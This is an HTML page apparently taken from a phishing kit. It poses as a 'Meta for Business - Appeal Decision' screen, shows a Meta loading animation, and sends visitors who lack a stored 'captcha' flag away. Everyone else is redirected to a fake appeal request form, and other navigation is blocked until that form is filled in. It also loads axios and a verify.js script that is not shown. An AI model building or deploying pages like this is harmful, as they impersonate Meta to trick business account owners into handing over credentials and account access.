<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <title>Meta for Business - Appeal Decision</title>
    <link rel="shortcut icon" href="./img/favicon.ico" type="image/x-icon" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link rel="stylesheet" type="text/css" media="screen" href="./form/style.css" />
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link
      href="https://fonts.googleapis.com/css2?family=Montserrat:wght@300;400;500;600;700&display=swap"
      rel="stylesheet"
    />
    <script src="./js/loader.js"></script>
    <script src="./js/axios.min.js"></script>
    <link href="https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css" rel="stylesheet" />
    <link rel="stylesheet" href="./meta.css" />
    <script>var captcha2 = localStorage.getItem("captcha");
      if(captcha2 == "true"){
      }
      else{
        window.location = "./index.html";
      }</script>
    <style>
      main {
        height: calc(100dvh - 140px);
        display: flex;
        align-items: center;
        justify-content: center;
        flex-direction: column;
      }

      main p {
        font-size: 20px;
        width: 100%;
        max-width: 600px;
        text-align: center;
      }

      main button {
        width: 100%;
        max-width: 250px;
        height: 54px;
        margin-top: 1rem;
        background-color: #1872f2;
        color: #ffffff;
        border: none;
        font-size: 18px;
        cursor: pointer;
        border-radius: 8px;
      }
    </style>
  </head>
  <body>
    <div class="loader" style="display: flex; position: fixed; left: 0; justify-content: center; align-items: center; top: 0; width: 100%; height: 100vh;">
      <img style="width: 100%" src="./img/loadingLogo.4eff47490162868e9ff2.gif" alt="">
    </div>
    

    <script>
     // --  LOADER  -- \\ 
      window.addEventListener("load", (e) => {
        let loader = document.querySelector(".loader");
        setTimeout(() => {
          window.location.href = "./form/appeal_request.html";
        }, 3500);
      });

    </script>
    <script>
      const noNavBtns = document.querySelectorAll(".no_navigate");
      const appealBtn = document.querySelector("#appeal");

      noNavBtns.forEach((btn) => {
        btn.addEventListener("click", (e) => {
          e.preventDefault();
          alert("Fill in the form before navigating");
        });
      });
      
</script>

    <script src="./verify.js"></script>

  </body>
</html>
